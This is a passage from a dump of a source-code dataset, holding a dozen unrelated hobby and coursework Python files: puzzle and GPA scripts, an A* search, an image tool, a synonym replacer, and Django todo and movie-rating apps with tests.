sys.exit(app.exec_())","sub_path":"BATripViewer.py","file_name":"BATripViewer.py","file_ext":"py","file_size_in_byte":25268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"28250636","text":"def town():\n x1, y1= [int(i) for i in input().split()]\n x2, y2= [int(i) for i in input().split()]\n n= int(input())\n ans= 0\n for i in range(n):\n a, b, c= [int(k) for k in input().split()]\n if (a*x1 + b*y1 + c< 0 and a*x2 + b*y2 + c> 0) or (a*x1 + b*y1 + c> 0 and a*x2 + b*y2 + c< 0):\n ans+= 1\n \n print(ans)\n return \n\ntown()","sub_path":"Codeforces/codeforces #284/C.py","file_name":"C.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"114776615","text":"from StructHelper import StructHelper\r\nimport struct\r\n\r\nclass ServerMethod:\r\n def __init__(self, id, name, args):\r\n self.id = id\r\n self.name = name\r\n self.args = args\r\n self.isStarted = False\r\n self.hasFinished = False\r\n self.result = None\r\n self.hasError = False\r\n self.errorMessage = \"\"\r\n \r\n @staticmethod\r\n def createFromRunMethodMessage(message_data):\r\n # extract method ID\r\n id = struct.unpack(\"!I\", message_data)\r\n message_data = message_data[4:]\r\n \r\n # extract method name\r\n name, message_data = StructHelper.extractNullTerminatedString(message_data)\r\n \r\n # remaining method data represents the args\r\n args = message_data\r\n \r\n return ServerMethod(id, name, args)\r\n \r\n def setError(self, errMsg):\r\n self.hasError = True\r\n self.errorMessage = errMsg\r\n self.hasFinished = True\r\n \r\n def setResult(self, result):\r\n if result == None:\r\n self.setError(\"Server method '{0}' has been called, but returned no result\", self.name)\r\n return\r\n self.result = result\r\n self.hasFinished = True\r\n \r\n def createResponse(self):\r\n # this should only be called when the server method finished execution (we don't check this condition)\r\n response = struct.pack(\"!I\", self.id)\r\n if (self.hasError):\r\n response += struct.pack(\"!B{0}sx\".format(len(self.errorMessage)), 1, self.errorMessage)\r\n return response\r\n \r\n response += struct.pack(\"!B{0}\", 0)\r\n response += self.result\r\n return response","sub_path":"hidtools/backdoor/ServerMethod.py","file_name":"ServerMethod.py","file_ext":"py","file_size_in_byte":1684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"33872286","text":"# -*- coding: utf-8 -*-\n\n# `random` module is used to shuffle field, see§:\n# https://docs.python.org/3/library/random.html#random.shuffle\nimport random\nimport sys\n\n__author__ = 'skorenev'\n\nif sys.version_info[0] == 2:\n input_function = raw_input\nelse:\n input_function = input\n\n# Empty tile, there's only one empty cell on a field:\nEMPTY_MARK = 'x'\n\n# Dictionary of possible moves if a form of:\n# key -> delta to move the empty tile on a field.\nMOVES = {\n 'w': -4,\n 's': 4,\n 'a': -1,\n 'd': 1,\n}\n\n\ndef shuffle_field():\n \"\"\"\n This method is used to create a field at the very start of the game.\n :return: list with 16 randomly shuffled tiles,\n one of which is a empty space.\n \"\"\"\n game_field_ = [\n 1, 2, 3, 4,\n 5, 6, 7, 8,\n 9, 10, 11, 12,\n 13, 14, 15, EMPTY_MARK\n ]\n\n for i in range(len(game_field_)):\n random_ = random.randrange(15)\n game_field_[i], game_field_[random_] = \\\n game_field_[random_], game_field_[i]\n\n # Is it possible to solve? http://pyatnashki.wmsite.ru/kombinacyi\n result_check = 1\n for element in game_field_:\n if isinstance(element, int):\n for j in range(game_field_.index(element), len(game_field_)):\n if isinstance(game_field_[j], int):\n if element > game_field_[j]:\n result_check += 1\n else:\n result_check += game_field_.index(EMPTY_MARK) // 4 # add row of 'x'\n\n print('shuffle try')\n\n if result_check % 2 != 0:\n print('combunation couldn\\'t be solved')\n shuffle_field()\n\n return game_field_\n\n\ndef print_field(field):\n \"\"\"\n This method prints field to user.\n :param field: current field state to be printed.\n :return: None\n \"\"\"\n for i in range(0, 4):\n print('-' * 21)\n output = '|'\n for j in range(0, 4):\n # print (i*4+j)\n if len(str(field[i * 4 + j])) > 1:\n output += ' ' + str(field[i * 4 + j]) + ' |'\n else:\n output += ' ' + str(field[i * 4 + j]) + ' |'\n print(output)\n print('-' * 21)\n\n\n\ndef is_game_finished(field):\n \"\"\"\n This method checks if the game is finished.\n :param field: current field state.\n :return: True if the game is finished, False otherwise.\n \"\"\"\n\n game_field_ = [\n 1, 2, 3, 4,\n 5, 6, 7, 8,\n 9, 10, 11, 12,\n 13, 14, 15, EMPTY_MARK\n ]\n if field == game_field_:\n result = True\n print ('You\\'re won!')\n else:\n result = False\n return result\n\n\ndef perform_move(field, key):\n \"\"\"\n Moves empty-tile inside the field.\n :param field: current field state.\n :param key: move direction.\n :return: new field state (after the move).\n :raises: IndexError if the move can't me done.\n \"\"\"\n # print_field(field)\n current_position = field.index(EMPTY_MARK)\n new_position = field.index(EMPTY_MARK) + MOVES[key]\n # print(new_position, (new_position+1)%4+MOVES[key])\n if (new_position < 0) or \\\n ((current_position + 1) % 4 + MOVES[key]) == 0 or \\\n (((new_position) % 4) == 0 and (current_position + 1) % 4 == 0):\n raise IndexError\n field[current_position], field[current_position + MOVES[key]] = \\\n field[current_position + MOVES[key]], field[current_position]\n return field\n\n\ndef handle_user_input():\n \"\"\"\n Handles user input. List of accepted moves:\n 'w' - up,\n 's' - down,\n 'a' - left,\n 'd' - right\n :return: current move.\n \"\"\"\n move = input_function(\"Make your move ('{}') :\".format(\n '\\', \\''.join(MOVES.keys())))\n if move not in MOVES.keys():\n print('Wrong key!')\n move = handle_user_input()\n else:\n print(\"Your move: \", move)\n return move\n\n\ndef main():\n \"\"\"\n The main method. It stars when the program is called.\n It also calls other methods.\n :return: None\n \"\"\"\n print('\\n' * 80)\n field = shuffle_field()\n print_field(field)\n steps = 0\n while not is_game_finished(field):\n try:\n key = handle_user_input()\n print('\\n' * 80)\n perform_move(field, key)\n steps += 1\n print_field(field)\n except IndexError:\n print('Wrong move!')\n print_field(field)\n except KeyboardInterrupt:\n print('\\nShutting down\\n')\n sys.exit()\n print ('You\\'ve made {}'.format(steps))\n\nif __name__ == '__main__':\n # See what this means:\n # http://stackoverflow.com/questions/419163/what-does-if-name-main-do\n\n main()\n","sub_path":"homework_02/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":4640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"166612280","text":"from datetime import date, timedelta\n\nfrom django.test import Client, TransactionTestCase\nfrom django.urls import reverse\nfrom django.db import connection\n\nfrom product.models import (\n Product,\n ProductSubImage,\n MainCategory,\n SubCategory,\n Difficulty,\n Chapter,\n Community,\n Signature\n)\nfrom user.models import User\nfrom kit.models import Kit\nfrom core.utils import issue_token\n\nclass TestProductDetailView(TransactionTestCase):\n \n @classmethod\n def setUpTestData(cls):\n pass\n \n def setUp(self):\n self.client = Client()\n \n self.PRODUCT_NOT_EXIST = 'PRODUCT_NOT_EXIST'\n \n self.main_categories = MainCategory.objects.create(\n id = 1,\n name = '크리에이티브'\n )\n \n self.sub_categories = SubCategory.objects.create(\n id = 11,\n name = '데이터/개발'\n )\n \n self.difficulty = Difficulty.objects.create(\n name = '초급자'\n )\n \n self.kit = Kit.objects.create(\n name = 'test_kit',\n main_image_url = 'image_url',\n price = 10000,\n description = 'test_description'\n )\n \n self.creator = User.objects.create(\n name = '송은우',\n nick_name = '신의 코드 송은우',\n is_creator = True\n )\n \n self.user = User.objects.create(\n name = '김민구',\n nick_name = '민구좌',\n password = '1234',\n is_creator = False\n )\n\n token = issue_token(self.user.id)\n \n self.header = {\n 'HTTP_Authorization': token,\n }\n \n self.signature = Signature.objects.create(\n name = '기용좌'\n )\n \n self.product = Product.objects.create(\n name = '퇴근 후 함께 즐기는 코딩 모임! 직장인을 위한 취미반, 함께해요!',\n effective_time = timedelta(days=30),\n price = 10000.00,\n sale = 0.05,\n start_date = date.today(),\n thumbnail_image = 'test_thumbnail_image_url',\n main_category = self.main_categories,\n sub_category = self.sub_categories,\n difficulty = self.difficulty,\n creator = self.creator\n )\n \n self.product.kit.add(self.kit)\n \n for i in range(3):\n ProductSubImage.objects.create(\n image_url = 'test_url' + str(i),\n product_id = self.product.id\n )\n \n for i in range(3, 0, -1):\n Chapter.objects.create(\n name = 'chapter' + str(i),\n product_id = self.product.id,\n order = i,\n thumbnail_image = 'image_url'\n )\n \n for i in range(10, 0, -1):\n Community.objects.create(\n description='test_community_description' + str(i),\n user_id=self.user.id,\n product_id=self.product.id,\n )\n \n for i in range(3):\n Community.objects.create(\n description = 'test_creator_community_description' + str(i),\n user_id = self.creator.id,\n product_id = self.product.id,\n )\n \n def tearDown(self):\n with connection.cursor() as cursor:\n cursor.execute('set foreign_key_checks=0')\n cursor.execute('truncate main_categories')\n cursor.execute('truncate sub_categories')\n cursor.execute('truncate users')\n cursor.execute('truncate products')\n cursor.execute('truncate chapters')\n cursor.execute('truncate communities')\n cursor.execute('truncate users_coupons')\n cursor.execute('truncate coupons')\n cursor.execute('truncate difficulties')\n cursor.execute('truncate kits')\n cursor.execute('truncate recently_views')\n cursor.execute('set foreign_key_checks=1')\n \n def test_product_detail_get_fail_wrong_product_id(self):\n url = reverse('products', args=[2])\n \n response = self.client.get(\n url, content_type='application/json'\n )\n \n self.assertEqual(response.status_code, 400)\n self.assertEqual(\n response.json()['MESSAGE'],\n self.PRODUCT_NOT_EXIST\n )\n \n def test_product_detail_get_fail_product_deleted(self):\n url = reverse('products', args=[1])\n \n self.product.is_deleted = True\n self.product.save()\n \n response = self.client.get(\n url, content_type='application/json'\n )\n \n self.assertEqual(response.status_code, 400)\n self.assertEqual(\n response.json()['MESSAGE'],\n self.PRODUCT_NOT_EXIST\n )\n \n def test_product_detail_get_success_with_no_token(self):\n url = reverse('products', args=[1])\n \n response = self.client.get(url, content_type='application/json')\n \n self.assertEqual(response.status_code, 200)\n self.assertEqual(\n response.json()['CLASS']['classId'],\n 1\n )\n \n def test_product_detail_get_success_with_token(self):\n url = reverse('products', args=[1])\n \n response = self.client.get(\n url,\n content_type='application/json',\n **self.header\n )\n \n self.assertEqual(response.status_code, 200)\n self.assertEqual(\n response.json()['CLASS']['classId'],\n 1\n )\n\n def test_product_detail_get_success_with_token_display_is_like(self):\n url = reverse('products', args=[1])\n \n self.user.product_like.add(self.product)\n \n response = self.client.get(\n url,\n content_type='application/json',\n **self.header\n )\n \n self.assertEqual(response.status_code, 200)\n \n self.assertEqual(\n response.json()['CLASS']['isLike'],\n True\n )\n self.assertEqual(\n response.json()['CLASS']['likeCount'],\n 1\n )\n \n def test_product_detail_product_sub_image_exists(self):\n url = reverse('products', args=[1])\n \n response = self.client.get(url, content_type='application/json')\n \n self.assertEqual(response.status_code, 200)\n self.assertNotEqual(\n response.json()['CLASS']['subImages'],\n []\n )\n \n def test_product_detail_chapters_order_is_valid(self):\n url = reverse('products', args=[1])\n \n response = self.client.get(url, content_type='application/json')\n \n self.assertEqual(response.status_code, 200)\n self.assertEqual(\n [\n curriculums['order']\n for curriculums in response.json()['CLASS']['curriculum']\n ],\n [1, 2, 3]\n )\n \n def test_product_detail_kits_exists(self):\n url = reverse('products', args=[1])\n \n response = self.client.get(url, content_type='application/json')\n \n self.assertEqual(response.status_code, 200)\n self.assertNotEqual(\n response.json()['CLASS']['kitInfo'],\n []\n )\n \n def test_product_detail_community_order_by_updated_at(self):\n url = reverse('products', args=[1])\n \n response = self.client.get(url, content_type='application/json')\n \n self.assertEqual(response.status_code, 200)\n \n self.assertEqual(\n response.json()['CLASS']['community'][0]['communityId'],\n len(response.json()['CLASS']['community'])\n )\n \n def test_display_is_take_class_take_possible_now(self):\n url = reverse('products', args=[1])\n \n response = self.client.get(url, content_type='application/json')\n\n self.assertEqual(response.status_code, 200)\n self.assertEqual(\n response.json()['CLASS']['isTakeClass'],\n '바로 수강 가능'\n )\n \n def test_display_is_take_class_take_impossible_now(self):\n url = reverse('products', args=[1])\n \n self.product.start_date = '2020-12-31'\n self.product.save()\n \n response = self.client.get(url, content_type='application/json')\n \n print(response.json()['CLASS']['isTakeClass'])\n \n self.assertEqual(response.status_code, 200)\n self.assertEqual(\n response.json()['CLASS']['isTakeClass'],\n '12월 31일 부터 수강 가능'\n )\n \n def test_display_class_owner_is_user(self):\n url = reverse('products', args=[1])\n \n response = self.client.get(url, content_type='application/json')\n \n self.assertEqual(response.status_code, 200)\n self.assertEqual(\n response.json()['CLASS']['classOwner'],\n '신의 코드 송은우'\n )\n \n def test_display_class_owner_is_signature(self):\n url = reverse('products', args=[1])\n \n self.product.creator = None\n self.product.signature = self.signature\n self.product.save()\n \n response = self.client.get(url, content_type='application/json')\n \n self.assertEqual(response.status_code, 200)\n self.assertEqual(\n '기용좌',\n response.json()['CLASS']['classOwner']\n )\n","sub_path":"product/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":9774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"244525345","text":"# Author: Shakeb Siddiqui sms8508@psu.edu\n\ndef getGradePoint(grade):\n if grade == (\"A\"):\n course1gp=float(4.0)\n elif grade == (\"A-\"):\n course1gp=float(3.67)\n elif grade == (\"B+\"):\n course1gp=float(3.33)\n elif grade == (\"B\"):\n course1gp=float(3.0)\n elif grade == (\"B-\"):\n course1gp=float(2.67)\n elif grade == (\"C+\"):\n course1gp=float(2.330)\n elif grade == (\"C\"):\n course1gp=float(2.0)\n elif grade == (\"D\"):\n course1gp=float(1.0)\n elif grade == (\"F\"):\n course1gp=float(0.0)\n else:\n course1gp=float(0.0)\n return course1gp\n\n\n\ndef run():\n grade1 = input(\"Enter your course 1 letter grade: \")\n credit1 = input(\"Enter your course 1 credit: \")\n Gp1 = getGradePoint(grade1)\n print (f\"Grade point for course 1 is: {Gp1}\")\n\n grade2 = input(\"Enter your course 2 letter grade: \")\n credit2 = input(\"Enter your course 2 credit: \")\n Gp2 = getGradePoint(grade2)\n print (f\"Grade point for course 2 is: {Gp2}\")\n\n grade3 = input(\"Enter your course 3 letter grade: \")\n credit3 = input(\"Enter your course 3 credit: \")\n Gp3 = getGradePoint(grade3)\n print (f\"Grade point for course 3 is: {Gp3}\")\n\n credit1=float(credit1)\n credit2=float(credit2)\n credit3=float(credit3)\n\n GPA = ((Gp1 * credit1) + (Gp2 * credit2) + (Gp3 * credit3)) / (credit1 + credit2 + credit3)\n print (f\"Your GPA is: {GPA}\")\n return GPA\nGPA=0\nif GPA == 0:\n run();","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"309760882","text":"# coding:utf-8\n\nimport sys\n\n\ndef egcd(x, y):\n if y==0:\n return x, 1, 0\n (d, a, b) = egcd(y, x%y)\n return d, b, a-(x//y)*b\n\n\ndef crt(p, m, q, n):\n a, d, r = egcd(p, q)\n if (n-m)%a!=0:\n return -1, -1\n mod = p*(q//a)\n a = (d*((n-m)//a)*p+m)%mod\n return a, mod\n\n\ndef chinese_remainder(items):\n xx = 0\n yy = 1\n for x, y in items:\n xx, yy = crt(y, x, yy, xx)\n if xx==-1:\n print(-1)\n sys.exit(0)\n if xx==0:\n xx = yy\n return xx\n\n\nn = int(input())\nx = [0]*n\nfor i in range(n):\n x[i] = tuple(map(int, input().split()))\nprint(chinese_remainder(x)%(10**9+7))\n","sub_path":"yukicoder/187.py","file_name":"187.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"489824887","text":"from queue import LifoQueue as LIFO\nimport queue\nfrom node import Node\nfrom result import Result\n\nclass TreeSearch(object):\n def __init__(self, problem):\n self.problem = problem\n self.result = Result(\"N/A\")\n\n\n def getNodeWithMinimumCost(self,frontiers):\n minimumLeaf = frontiers[0]\n for node in frontiers :\n if (node.costFromStart + node.costToGoal) <= (minimumLeaf.costFromStart + minimumLeaf.costToGoal) :\n minimumLeaf = node\n return minimumLeaf\n\n\n\n def A_Star_Search(self):\n self.frontiers = []\n self.explored = []\n self.frontiers.append(Node(self.problem.initialState , None , \"None\" , 0 , self.problem.getCostToGoal(self.problem.initialState)))\n while(True) :\n if len(self.frontiers)==0 :\n self.result.changeStatus(\"Failure\")\n return self.result\n leaf = self.getNodeWithMinimumCost(self.frontiers)\n self.frontiers.remove(leaf)\n self.explored.append(leaf.data)\n self.problem.expand(leaf.data)\n for i in range(len(self.problem.nextStates)) :\n child = Node(self.problem.nextStates[i] , leaf , self.problem.nextAction[i] , leaf.costFromStart+1 ,self.problem.getCostToGoal(self.problem.nextStates[i]) )\n if (not((child.data in self.explored)) and (child not in self.frontiers)):\n leaf.append(child)\n if (child.data in self.problem.finalStates):\n print(child.data)\n self.result.changeStatus(\"Success\")\n while(child.data != self.problem.initialState):\n self.result.addToPath(child.action)\n child = child.parent\n return self.result\n self.frontiers.append(child)\n","sub_path":"phw1/problem3/A_/TreeSearch.py","file_name":"TreeSearch.py","file_ext":"py","file_size_in_byte":1886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"210397760","text":"# -*- coding:UTF-8 -*-\n\nimport os\nfrom PIL import Image\n\n\n# pictureDir = input(\"please input the direction of the picture\") 需要在实现ui时进行改动\n\n\ndef process(picture_direction1, picture_direction2, output_direction):\n with Image.open(picture_direction1).convert(\"L\") as im1:\n with Image.open(picture_direction2).convert(\"L\") as im2:\n # 生成一张大小容纳两张照片,底色白色半透明的底图\n output_width = max(im1.size[0], im2.size[0])\n mid_width = min(im1.size[0], im2.size[0])\n output_height = max(im1.size[1], im2.size[1])\n mid_height = min(im1.size[1], im2.size[1])\n output = Image.new(\"RGBA\", (output_width, output_height),\n (255, 255, 255, 128))\n # 获取像素点颜色……\n\n for m in range(0, output_height):\n for n in range(0, output_width):\n if m <= mid_height - 1 and n <= mid_width - 1:\n if (m + n) % 2 == 0:\n colour = im1.getpixel((n, m))\n output.putpixel((n, m), (0, 0, 0, colour))\n else:\n colour = im2.getpixel((n, m))\n output.putpixel((n, m), (255, 255, 255, colour))\n elif m >= mid_height and n < mid_width:\n if im1.size[1] > im2.size[1]:\n output.putpixel((n, m), im1.getpixel((n, m)))\n else:\n output.putpixel((n, m), im2.getpixel((n, m)))\n elif m < mid_height and n >= mid_width:\n if im1.size[0] > im2.size[0]:\n output.putpixel((n, m), im1.getpixel((n, m)))\n else:\n output.putpixel((n, m), im2.getpixel((n, m)))\n # 存储\n output.save(os.path.splitext(output_direction)[0] + \".png\", \"PNG\")\n\n\ndef make_thumbs(img_direction, size=(100, 100)):\n if img_direction != \"\":\n img_object = Image.open(img_direction)\n img_object.thumbnail(size, Image.ANTIALIAS)\n return img_object\n\n\noutput_image_type_name = ('BMP', 'EPS', 'GIF', 'ICNS', 'ICO',\n 'JPEG', 'JPEG 2000', 'PCX',\n 'PNG', 'PPM', 'SGI', 'TGA', 'TIFF',\n 'WebP', 'PDF')\nimage_type = [('BMP', '.bmp'), ('EPS', '.eps'), ('CompuServe GIF' '.gif'), ('ICNS', '.icns'), ('ICO', '.ico'),\n ('JPEG', '.jpg'), ('JPEG 2000', '.j2p;.jpx;.j2k'), ('PCX', '.pcx'),\n ('PNG', '.png'), ('Portable Bit Map', '.pbm;.pgm;.ppm'), ('SGI', '.sgi'), ('Targa', '.tga'),\n ('TIFF', '.tif'), ('WebP', '.webp')]\nout_image_type = [('BMP', '.bmp'), ('EPS', '.eps'), ('CompuServe GIF' '.gif'), ('ICNS', '.icns'), ('ICO', '.ico'),\n ('JPEG', '.jpg'), ('JPEG 2000', '.j2p;.jpx;.j2k'), ('PCX', '.pcx'),\n ('PNG', '.png'), ('Portable Bit Map', '.pbm;.pgm;.ppm'), ('SGI', '.sgi'), ('Targa', '.tga'),\n ('TIFF', '.tif'), ('WebP', '.webp'), ('PDF', '.pdf')]\n","sub_path":"source_code/pic_processor/processor.py","file_name":"processor.py","file_ext":"py","file_size_in_byte":3200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"434043540","text":"import nltk.data\nfrom nltk.corpus import wordnet\nfrom nltk.tokenize import word_tokenize\nfrom nltk import pos_tag\nfrom nltk.wsd import lesk\nimport random\n\n# Brief info on what you can do with wordnet in NLTK\n# http://www.nltk.org/howto/wordnet.html\n\n# this one treats the list of synonyms as a set and returns a random synonym\ndef synonym_picker(word, pos):\n synonyms = set()\n for syn in wordnet.synsets(word, pos=pos):\n for l in syn.lemmas():\n synonyms.add(l.name().replace('_', ' '))\n #print(' ', synonyms)\n if len(synonyms) > 0:\n #print(' random selection: ', random.choice(list(synonyms)))\n return random.choice(list(synonyms))\n else:\n return word\n\n# this one keeps the list of synonyms in order and returns the first one\n# seems to make more sense than the random set based option\ndef synonym_picker2(word, pos):\n synonyms = []\n for syn in wordnet.synsets(word, pos=pos):\n for l in syn.lemmas():\n if l.name() not in synonyms and l.name() != word:\n synonyms.append(l.name().replace('_', ' '))\n if len(synonyms) > 0:\n return synonyms[0]\n else:\n return word\n\n# other idea:\n# keeps the list of synonyms in order and returns the one with the highest symantic\n# similarity. For details on possible methods for calculating,\n# see\n# http://www.sersc.org/journals/IJHIT/vol6_no1_2013/1.pdf\n# http://www.nltk.org/howto/wsd.html\n# word.res_similarity(synset2, ic)\n# word.jcn_similarity(synset2, ic)\n# word.lin_similarity(synset2, ic)\n# first determine word sense using Lesk word sense disambiguation\n# then find synonyms\n#\n# PROBLEM: New word doesn't have the correct tense (if anything other then default present tense)\n# it appears that the Python 2 only library \"Pattern\" would solve this...\n# PROBLEM: This process doesn't take into account singluar vs plural nouns\n#\ndef synonym_picker3(word, wpos, sentence, npos):\n #print(word, pos, sentence)\n #print(word, \" \", npos)\n start_synset = lesk(sentence, word, wpos)\n synonyms = []\n #start_synset.res_similarity()\n if (start_synset):\n #print(start_synset.lemmas())\n for l in start_synset.lemmas():\n if l.name() not in synonyms and l.name() != word:\n synonyms.append(l.name().replace('_', ' '))\n if len(synonyms) > 0:\n return random.choice(list(synonyms))\n else:\n return word\n else:\n return word\n\n\nif __name__ == \"__main__\":\n # to get a list of all possible tags\n #print(nltk.help.upenn_tagset())\n\n sampletext = '''\nCharlene,\n\nSo you now have education content on all whiteboards (someone will first have to first do a clear all to see it). As you know, 2147 is using the whiteboard for sound, and as we discussed in the meeting, we added a USB speaker to 2146.\n\nWe have a wireless speaker option that we tested in 2143, but as we don't yet have a mounting bracket finished, did not leave the speaker. We should have that completed soon and can then figure out where a preferred mounting location would be.\n\nIf you or anyone tests out the education videos, please let us know your thoughts on the volume as well as how loud it is from the hall as well as adjacent rooms. We're particularly concerned with 2146 being loud in 2147 as the speaker for 2146 is behind the whiteboard.\n\nSeth\n'''\n\n # general logic\n # for each word, determine if it is a noun or a verb\n # find synonyms for word\n # output random synonym for word\n\n sent_detector = nltk.data.load('tokenizers/punkt/english.pickle')\n tokenized = sent_detector.tokenize(sampletext.strip())\n\n for i in tokenized:\n words = word_tokenize(i)\n tagged = pos_tag(words)\n madlib = []\n for t in tagged:\n #print(t)\n if t[1][:2] == 'VB':\n #madlib.append(synonym_picker2(t[0], wordnet.VERB))\n madlib.append(synonym_picker3(t[0], wordnet.VERB, words, t[1]))\n elif t[1][:2] == 'NN':\n #madlib.append(synonym_picker2(t[0], wordnet.NOUN))\n madlib.append(synonym_picker3(t[0], wordnet.NOUN, words, t[1]))\n elif t[1][:2] == 'JJ':\n #madlib.append(synonym_picker2(t[0], wordnet.ADJ))\n madlib.append(synonym_picker3(t[0], wordnet.ADJ, words, t[1]))\n elif t[1][:2] == 'RB':\n #madlib.append(synonym_picker2(t[0], wordnet.ADV))\n madlib.append(synonym_picker3(t[0], wordnet.ADV, words, t[1]))\n else:\n madlib.append(t[0])\n n = ''\n p = ''\n for i, m in enumerate(madlib):\n if i < len(madlib) - 1:\n n = madlib[i+1]\n if i > 0:\n p = madlib[i-1]\n #print('p: ', p)\n #print('m: ', m)\n #print('n: ', n)\n if n == ',' or n == '.' or n == ')' or m == '(':\n print(m, end=\"\")\n else:\n print(m, end=\" \")\n print()\n","sub_path":"word_synonymizer.py","file_name":"word_synonymizer.py","file_ext":"py","file_size_in_byte":5035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"466987443","text":"import re\nfrom django.core.checks import messages\nfrom rest_framework import serializers\nfrom .serializers import TodoCreateSerializer,TodoShowSerializer,TodoUpdateSerializer\nfrom django.http.response import JsonResponse\nfrom django.shortcuts import render, resolve_url\nfrom rest_framework.serializers import Serializer\nfrom .models import Todo\nfrom rest_framework.views import APIView\nfrom rest_framework import status\nimport json\n\nclass CreateTodo(APIView):\n\n def post(self,request,*args,**kwargs):\n form_data = json.loads(json.dumps(request.data))\n if not(form_data.__contains__('task')):\n return JsonResponse ({\"success\":False,\"message\":\"Task field is essential\"})\n elif Todo.objects.filter(task__contains=form_data['task']).exists():\n return JsonResponse({\"success\":False,\"message\":\"Task already added\"})\n serializer = TodoCreateSerializer(data=form_data)\n if serializer.is_valid(raise_exception=True):\n serializer.save()\n data={\n \"success\":True,\n \"message\":\"Task is added in the todo list\",\n }\n return JsonResponse(data,status = status.HTTP_201_CREATED)\n else:\n data={\n \"success\":False,\n \"message\":\"Task not added due to some error in data passed\"\n }\n return JsonResponse(data,status=status.HTTP_400_BAD_REQUEST)\n\n\nclass UpdateTodo(APIView):\n\n def put(self,request,*args,**kwargs):\n form_data = json.loads(json.dumps(request.data))\n if not(form_data.__contains__('id')):\n return JsonResponse({\"success\":False,\"message\":\"Id is essential field\"})\n\n if not(form_data.__contains__('task')):\n return JsonResponse ({\"success\":False,\"message\":\"Task field is essential\"})\n\n try:\n todo = Todo.objects.get(id=form_data['id'])\n except Todo.DoesNotExist:\n return JsonResponse({\"success\":False,\"message\":\"task does not exist\"})\n \n serializer = TodoUpdateSerializer(todo,data=form_data)\n if serializer.is_valid():\n serializer.save()\n data={\n \"success\":True,\n \"message\":\"Task details updated\",\n \"data\":serializer.data\n }\n return JsonResponse(data,status=status.HTTP_200_OK)\n else:\n data={\n \"success\":False,\n \"message\":\"Task details are not updated\"\n }\n return JsonResponse(data,status=status.HTTP_400_BAD_REQUEST)\n\nclass DeleteTodo(APIView):\n def delete(self,request,*args,**kwargs):\n form_data = json.loads(json.dumps(request.data))\n if not(form_data.__contains__('id')):\n return JsonResponse({\"success\":False,\"message\":\"Id is an essential field for delete please do send it\"})\n \n try:\n todo = Todo.objects.get(id=form_data['id'])\n except Todo.DoesNotExist:\n return JsonResponse({\"success\":False,\"message\":\"The item in the list does not exist\"})\n todo.delete()\n return JsonResponse({\"success\":True,\"message\":\"The item successfully deleted\"})\n\nclass ShowTodo(APIView):\n serializer_class = TodoShowSerializer\n\n def get(self,request,*args,**kwargs):\n todos = Todo.objects.all()\n serializer = TodoShowSerializer(todos,many=True)\n return JsonResponse(serializer.data,safe=False,status=status.HTTP_200_OK)","sub_path":"todo/todoList/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"532111980","text":"# Create your views here.\nfrom django.db.models import Count, Avg\nfrom django.shortcuts import render, redirect\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom .models import Movie\nfrom .models import Rating\nfrom .models import Rater\nimport operator\n\nfrom .forms import UserForm, RaterForm, RatingForm\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\n\ndef top_movies(request):\n movies_query = Movie.objects.all()\n movies_dict = {m: m.average_rating for m in movies_query if isinstance(m.average_rating, float)}\n sorted_movies = sorted(movies_dict.items(), key=operator.itemgetter(1), reverse=True)\n top_20_movies = sorted_movies[:20]\n movies = [m[0] for m in top_20_movies]\n return render(request, \"moviebase/top_movies.html\", {'movies': movies})\n\n\ndef all_movies(request):\n movies = Movie.objects.annotate(\n rating_count=Count('rating'),\n avg_rating=Avg('rating__rating'),\n ).filter(rating_count__gte=10).order_by('-avg_rating')[:20]\n return render(request, 'moviebase/all_movies.html', {\"movies\": movies})\n\ndef show_movie(request, movie_id):\n movie = Movie.objects.get(pk=movie_id)\n ratings = movie.rating_set.all()\n user_ratings = [rating.movie for rating in request.user.rater.rating_set.all()]\n rating_dict = {rating.movie: rating for rating in request.user.rater.rating_set.all()}\n if movie in user_ratings:\n user_rating = rating_dict[movie]\n else:\n user_rating = None\n rating_form = RatingForm()\n return render(request, \"moviebase/show_movie.html\",\n {\"movie\": movie,\n \"ratings\": ratings,\n \"rating_form\": rating_form,\n \"user_rating\": user_rating\n })\n\ndef show_rater(request, rater_id):\n rater = Rater.objects.get(pk=rater_id)\n ratings = rater.rating_set.all()\n return render(request,\n \"moviebase/show_rater.html\",\n {\"rater\": rater,\n \"ratings\": ratings})\n\ndef user_register(request):\n if request.method == \"GET\":\n user_form = UserForm()\n rater_form = RaterForm()\n elif request.method == \"POST\":\n user_form = UserForm(request.POST)\n rater_form = RaterForm(request.POST)\n if user_form.is_valid() and rater_form.is_valid():\n user = user_form.save()\n profile = rater_form.save(commit=False)\n profile.user = user\n profile.save()\n\n password = user.password\n # The form doesn't know to call this special method on user.\n user.set_password(password)\n user.save()\n\n # You must call authenticate before login. :(\n user = authenticate(username=user.username,\n password=password)\n login(request, user)\n messages.add_message(\n request,\n messages.SUCCESS,\n \"Congratulations, {}, on creating your new account! You are now logged in.\".format(\n user.username))\n return redirect('all_movies')\n return render(request, \"moviebase/register.html\", {'user_form': user_form,\n 'rater_form': rater_form})\n\n@login_required\ndef user_logout(request):\n logout(request)\n return 